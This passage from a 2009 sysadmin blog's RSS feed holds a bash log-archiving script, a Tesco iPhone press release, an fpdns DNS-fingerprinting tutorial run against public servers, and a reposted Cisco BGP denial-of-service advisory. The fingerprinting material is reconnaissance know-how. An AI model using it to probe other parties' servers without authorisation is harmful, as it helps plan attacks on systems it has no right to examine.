#Set todays date<br />
TODAYSDATE=`date +&#8221;%d-%b-%Y&#8221;`</p>
<p>#Format Archive<br />
TODAYS_ARCHIVE=archive.$TODAYSDATE</p>
<p>#####################################################################<br />
#                    Finished setting up Variables<br />
#<br />
#                   Now start processing the log files<br />
#####################################################################</p>
<p># Make a directory called archive with todays date and change to that direcory<br />
mkdir $TODAYS_ARCHIVE<br />
cd $TODAYS_ARCHIVE</p>
<p>#Write the log files<br />
#Archive todays Syslog, extract all firewall related logs to firewall, then<br />
# extract messages<br />
cat /var/log/syslog | grep &#8220;`date +&#8221;%b %e&#8221; `&#8221; &gt; syslog.$TODAYSDATE<br />
cat syslog.$TODAYSDATE | grep UFW &gt; firewall_log.$TODAYSDATE<br />
cat /var/log/messages | grep &#8220;`date +&#8221;%b %e&#8221; `&#8221; &gt; messages.$TODAYSDATE<br />
#Process the OPEN VPN Server logs<br />
cat syslog.$TODAYSDATE | grep &#8220;ovpn-server&#8221; &gt; vpn_server_log.$TODAYSDATE<br />
#<br />
#Proceess Apache Logs<br />
cat /var/log/apache2/error.log | grep &#8220;`date +&#8221;%b %d&#8221; `&#8221; &gt; apache_error_log.$TODAYSDATE<br />
cat /var/log/apache2/access.log | grep &#8220;`date +&#8221;%d/%b&#8221; `&#8221; &gt; apache_access_log.$TODAYSDATE<br />
#<br />
#Process FTP Logs<br />
cat /var/log/vsftpd.log | grep &#8220;`date +&#8221;%b %e&#8221; `&#8221; &gt; ftp_log.$TODAYSDATE<br />
#<br />
# Get a list of currently running process<br />
ps aux &gt; Processes.$TODAYSDATE</p>
<p># Zip up all the logs and delete todays log<br />
zip /archive/$TODAYS_ARCHIVE.zip *<br />
cd ..<br />
rm -r $TODAYS_ARCHIVE</p>
<p>####################################################################<br />
#                     Now email the zip file<br />
###################################################################<br />
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s &#8220;Event logs for $TODAYSDATE&#8221; you@your.email.address.com</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/12/09/linux-automatically-send-logs-daily/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tesco to sell iPhone on Tesco Mobile</title>
		<link>http://rootadmin.co.uk/2009/11/27/tesco-sell-iphone-tesco-mobile/</link>
		<comments>http://rootadmin.co.uk/2009/11/27/tesco-sell-iphone-tesco-mobile/#comments</comments>
		<pubDate>Fri, 27 Nov 2009 23:13:56 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[02]]></category>
		<category><![CDATA[3G]]></category>
		<category><![CDATA[3Gs]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[liam rootadmin.co.uk]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[o2]]></category>
		<category><![CDATA[Pay as you go]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[Tesco]]></category>
		<category><![CDATA[tesco mobile]]></category>
		<category><![CDATA[Which]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=249</guid>
		<description><![CDATA[Tesco Mobile through its joint venture partnership with O2 is pleased to announce that it will shortly introduce iPhone 3G and iPhone 3GS in Tesco Phone Shops and online through Tesco Direct in the UK. For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/. For more information on iPhone, please visit www.apple.com/uk/iphone. [...]]]></description>
			<content:encoded><![CDATA[<p><a name="#1">Tesco Mobile through its joint venture partnership with O2 is pleased to announce that it will shortly introduce iPhone 3G and iPhone 3GS in Tesco Phone Shops and online through Tesco Direct in the UK.</a></p>
<p><a name="#1"> </a></p>
<p><a name="#1">For further information and for customers interested in pre-registration please visit </a><a href="http://www.tescomobileiphone.com/"><span style="color: #808080;">http://www.tescomobileiphone.com/</span></a>.</p>
<p>For more information on iPhone, please visit <a href="http://www.apple.com/uk/iphone"><span style="color: #808080;">www.apple.com/uk/iphone</span></a>.</p>
<p>More information can be found on Tesco Mobile at <a href="http://www.tescomobile.com/"><span style="color: #808080;">http://www.tescomobile.com/</span></a></p>
<p>About Tesco Mobile:</p>
<p>Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.</p>
<p>Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.</p>
<p>The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.</p>
<p>It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/11/27/tesco-sell-iphone-tesco-mobile/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fingering DNS Servers in ubuntu</title>
		<link>http://rootadmin.co.uk/2009/11/21/fingering-dns-servers-ubuntu/</link>
		<comments>http://rootadmin.co.uk/2009/11/21/fingering-dns-servers-ubuntu/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 21:27:45 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[finger]]></category>
		<category><![CDATA[Fingering DNS Servers in ubuntu]]></category>
		<category><![CDATA[fpdns]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=242</guid>
		<description><![CDATA[Install fpdns in Ubuntu sudo aptitude install fpdns This will complete the installation Using fpdns fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server Where: server is an ip address or a resolvable name or ‘-’ to read list of servers from stdin -c (where appropriate check CH TXT [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Install fpdns in Ubuntu</strong></p>
<p>sudo aptitude install fpdns</p>
<p>This will complete the installation</p>
<p><strong>Using fpdns</strong></p>
<p>fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] <a style="border-bottom: 0.075em solid darkgreen ! important; font-weight: normal ! important; font-size: 100% ! important; text-decoration: underline ! important; padding-bottom: 1px ! important; color: darkgreen ! important; background-color: transparent ! important; background-image: none; padding-top: 0pt; padding-right: 0pt; padding-left: 0pt;" href="http://www.ubuntugeek.com/howto-find-dns-server-version-remotely-using-fpdns-fingerprinting-dns-servers.html#" target="_blank">server</a></p>
<p>Where: server is an ip address or a resolvable name<br />
or ‘-’ to read list of servers from stdin<br />
-c (where appropriate check CH TXT version) [off]<br />
-d (debug) [off]<br />
-f (force check CH TXT version) [off]<br />
-F (maximum forked processes) [10]<br />
-p port (nameserver is on this port) [53]<br />
-Q srcaddr (source IP address) [0.0.0.0]<br />
-r retry (set number of attempts) [1]<br />
-s (short form) [off]<br />
-t time (set query timeout) [5]<br />
-v (show version)</p>
<p><strong>fpdns Examples</strong></p>
<p><strong>BIND Version 8 Example</strong></p>
<p>fpdns -D google.com</p>
<p>fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4<br />
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4<br />
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4<br />
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4</p>
<p><strong>BIND Version 9 Example</strong></p>
<p>fpdns -D debianhelp.co.uk</p>
<p>fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]<br />
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]</p>
<p><strong>TinyDNS Example</strong></p>
<p>fpdns ns1.eu.dedicatedserver.com.</p>
<p>fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05</p>
<p><strong>Microsoft windows 2003 Example</strong><br />
fpdns -D microsoft.com</p>
<p>fingerprint (<a style="border-bottom: 0.075em solid darkgreen ! important; font-weight: normal ! important; font-size: 100% ! important; text-decoration: underline ! important; padding-bottom: 1px ! important; color: darkgreen ! important; background-color: transparent ! important; background-image: none; padding-top: 0pt; padding-right: 0pt; padding-left: 0pt;" href="http://www.ubuntugeek.com/howto-find-dns-server-version-remotely-using-fpdns-fingerprinting-dns-servers.html#" target="_blank">microsoft</a>.com, 207.68.160.190): Microsoft Windows DNS 2003<br />
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003</p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/11/21/fingering-dns-servers-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Proof that the academic world has lost it!</title>
		<link>http://rootadmin.co.uk/2009/08/10/proof-accademic-world-lost/</link>
		<comments>http://rootadmin.co.uk/2009/08/10/proof-accademic-world-lost/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 20:34:46 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Other]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[Birmingham University]]></category>
		<category><![CDATA[Dr Linguist Caroline]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[Liam Somerville]]></category>
		<category><![CDATA[Linguist Caroline]]></category>
		<category><![CDATA[PHD Txt]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[root admin]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[somerville]]></category>
		<category><![CDATA[text messages]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=214</guid>
		<description><![CDATA[For some time now I have believed that there has been too much importance placed on the acadmic world. Today it would appear I was proven right. &#8220;A student at a British university has been awarded the first ever PhD in text messaging. Linguist Caroline Tagg &#8211; now Dr Caroline Tagg &#8211; spent more than three [...]]]></description>
			<content:encoded><![CDATA[<p>For some time now I have believed that there has been too much importance placed on the acadmic world. Today it would appear I was proven right.</p>
<div id="body">
<p>&#8220;A student at a British university has been awarded the first ever PhD in text messaging.</p>
<p>Linguist Caroline Tagg &#8211; now Dr Caroline Tagg &#8211; spent more than three years at Birmingham University researching the subject of text messages and the language used within them.</p>
<p>She trawled through 11,000 text messages sent by 235 people aged between 18 and 65 and together containing 190,000 words, and analysed them for the quality (or not) of their spelling, grammar and abbreviation.</p>
<p>She concluded that the average text contains 17.5 words and, contrary to the popular view that text messaging is eroding existing styles of written communication, that texts are good for the English language.</p>
<p>“Quite the contrary from destroying the English [language], [text messaging] is actually encouraging it,” she <a href="http://www.telegraph.co.uk/science/science-news/5984225/Texting-is-closer-to-speech-than-the-written-word-claims-academic.html" target="_blank">told</a> newspaper <em>The Telegraph</em>. ®&#8221; &#8211; James Sherwood, http://www.reghardware.co.uk/2009/08/10/texting_phd/</div>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/08/10/proof-accademic-world-lost/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco Security Advisory: Cisco IOS Software Border Gateway Protocol 4-Byte Autonomous System Number Vulnerabilities</title>
		<link>http://rootadmin.co.uk/2009/07/30/cisco-security-advisory-cisco-ios-software-border-gateway-protocol-4byte-autonomous-system-number-vulnerabilities/</link>
		<comments>http://rootadmin.co.uk/2009/07/30/cisco-security-advisory-cisco-ios-software-border-gateway-protocol-4byte-autonomous-system-number-vulnerabilities/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 05:04:52 +0000</pubDate>
		<dc:creator>Rootadmin</dc:creator>
				<category><![CDATA[Cisco]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[BGP Support for Four-octet AS Number Space]]></category>
		<category><![CDATA[Cisco IOS]]></category>
		<category><![CDATA[Cisco Security Advisory]]></category>
		<category><![CDATA[Document ID: 110457]]></category>
		<category><![CDATA[liam]]></category>
		<category><![CDATA[RFC4893]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rootadmin]]></category>
		<category><![CDATA[rootadmin.co.uk]]></category>
		<category><![CDATA[somerville]]></category>

		<guid isPermaLink="false">http://rootadmin.co.uk/?p=211</guid>
		<description><![CDATA[Recent versions of Cisco IOS Software support RFC4893 (&#8220;BGP Support for Four-octet AS Number Space&#8221;) and contain two remote denial of service (DoS) vulnerabilities when handling specific Border Gateway Protocol (BGP) updates. These vulnerabilities affect only devices running Cisco IOS Software with support for four-octet AS number space (here after referred to as 4-byte AS [...]]]></description>
			<content:encoded><![CDATA[<p>Recent versions of Cisco IOS Software support RFC4893 (&#8220;BGP Support for 	 Four-octet AS Number Space&#8221;) and contain two remote denial of service (DoS) 	 vulnerabilities when handling specific Border Gateway Protocol (BGP) updates.</p>
<p>These vulnerabilities affect only devices running Cisco IOS Software 	 with support for four-octet AS number space (here after referred to as 4-byte 	 AS number) and BGP routing configured.</p>
<p>The first vulnerability could cause an affected device to reload when 	 processing a BGP update that contains autonomous system (AS) path segments made 	 up of more than one thousand autonomous systems.</p>
<p>The second vulnerability could cause an affected device to reload when 	 the affected device processes a malformed BGP update that has been crafted to 	 trigger the issue.</p>
<p>Cisco has released free software updates to address these 	 vulnerabilities.</p>
<p>No workarounds are available for the first vulnerability.</p>
<p>A workaround is available for the second vulnerability.</p>
<p>This advisory is posted at the following link: 	 <a href="http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml</a>.</p>
<p><span style="text-decoration: underline;"><strong>Affected Products</strong></span></p>
<p>These vulnerabilities affect only devices running Cisco IOS and Cisco 	 IOS XE Software (here after both referred to as simply Cisco IOS) with support 	 for RFC4893 and that have been configured for BGP routing.</p>
<p>The software table in the section &#8220;Software Versions and Fixes&#8221; of this 	 advisory indicates all affected Cisco IOS Software versions that have support 	 for RFC4893 and are affected by this vulnerability.</p>
<p>A Cisco IOS software version that has support for RFC4893 will allow 	 configuration of AS numbers using 4 Bytes. The following example identifies a 	 Cisco device that has 4 byte AS number support:</p>
<blockquote>
<pre>Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  &lt;1-65535&gt;    Autonomous system number
  &lt;1.0-XX.YY&gt;  4 Octets Autonomous system number

Or:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  &lt;1-4294967295&gt;  Autonomous system number
  &lt;1.0-XX.YY&gt;     Autonomous system number</pre>
</blockquote>
<p>The following example identifies a Cisco device that has 2 byte AS 	 number support:</p>
<blockquote>
<pre>Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  &lt;1-65535&gt;  Autonomous system number</pre>
</blockquote>
<p>A router that is running the BGP process will contain a line in the 	 configuration that defines the autonomous system number (AS number), which can 	 be seen by issuing the command line interface (CLI) command <strong>&#8220;show 	 running-config&#8221;</strong>.</p>
<p>The canonical textual representation of four byte AS Numbers is 	 standardized by the IETF through 	 <a href="http://www.ietf.org/rfc/rfc5396.txt" target="_blank">RFC5396</a> <img src="http://www.cisco.com/images/exit.gif" alt="leavingcisco.com" width="18" height="18" /> (Textual Representation of Autonomous System (AS) Numbers). Two major ways for 	 textual representation have been defined as ASDOT and ASPLAIN. Cisco IOS 	 routers support both textual representations of AS numbers. For further 	 information about textual representation of four byte AS numbers in Cisco IOS 	 Software consult the document &#8220;Explaining 4-Byte Autonomous System (AS) ASPLAIN 	 and ASDOT Notation for Cisco IOS&#8221; at the following link: 	 <a href="http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6554/ps6599/white_paper_c11_516829.html">http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6554/ps6599/white_paper_c11_516829.html</a></p>
<p>Cisco IOS Software with support for RFC4893 is affected by both 	 vulnerabilities if BGP routing is configured using either ASPLAIN or ASDOT 	 notation.</p>
<p>The following example identifies a Cisco device that is configured for 	 BGP using ASPLAIN notation:</p>
<blockquote>
<pre>router bgp 65536</pre>
</blockquote>
<p>The following example identifies a Cisco device that is configured for 	 BGP using ASDOT notation:</p>
<blockquote>
<pre>router bgp 1.0</pre>
</blockquote>
<p>To determine the Cisco IOS Software release that is running on a Cisco 	 product, administrators can log in to the device and issue the show version 	 command to display the system banner. The system banner confirms that the 	 device is running Cisco IOS Software by displaying text similar to &#8220;Cisco 	 Internetwork Operating System Software&#8221; or &#8220;Cisco IOS Software.&#8221; The image name 	 displays in parentheses, followed by &#8220;Version&#8221; and the Cisco IOS Software 	 release name. Other Cisco devices do not have the show version command or may 	 provide different output.</p>
<p>The following example identifies a Cisco product that is running Cisco 	 IOS Software Release 12.3(26) with an installed image name of 	 C2500-IS-L:</p>
<blockquote>
<pre>Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih</pre>
</blockquote>
<p>The following example identifies a Cisco product that is running Cisco 	 IOS Software Release 12.4(20)T with an installed image name of 	 C1841-ADVENTERPRISEK9-M:</p>
<blockquote>
<pre>Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team</pre>
<p style="text-align: left;">The following Cisco products are confirmed not vulnerable:</p>
<ul style="text-align: left;">
<li> Cisco IOS Software not explicitly mentioned in this Advisory</li>
<li> Cisco IOS XR Software</li>
<li> Cisco IOS NX-OS</li>
</ul>
<p style="text-align: left;">No other Cisco products are currently known to be affected by this 	 vulnerability.</p>
<p style="text-align: left;">
<p style="text-align: left;">ObtainingFixed Software</p>
<p>Cisco has released free software updates that address these 	 vulnerabilities. Prior to deploying software, customers should consult their 	 maintenance provider or check the software for feature set compatibility and 	 known issues specific to their environment.</p>
<p>Customers may only install and expect support for the 	 feature sets they have purchased. By installing, downloading, accessing or 	 otherwise using such software upgrades, customers agree to be bound by the 	 terms of Cisco&#8217;s software license terms found at 	 <a href="http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html">http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html</a>, 	 or as otherwise set forth at Cisco.com Downloads at 	 <a href="http://www.cisco.com/public/sw-center/sw-usingswc.shtml">http://www.cisco.com/public/sw-center/sw-usingswc.shtml</a>.</p>
<p>Do not contact psirt@cisco.com or security-alert@cisco.com 	 for software upgrades.</p></blockquote>
<p><a href="http://www.cisco.com/warp/public/620/1.html"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://rootadmin.co.uk/2009/07/30/cisco-security-advisory-cisco-ios-software-border-gateway-protocol-4byte-autonomous-system-number-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
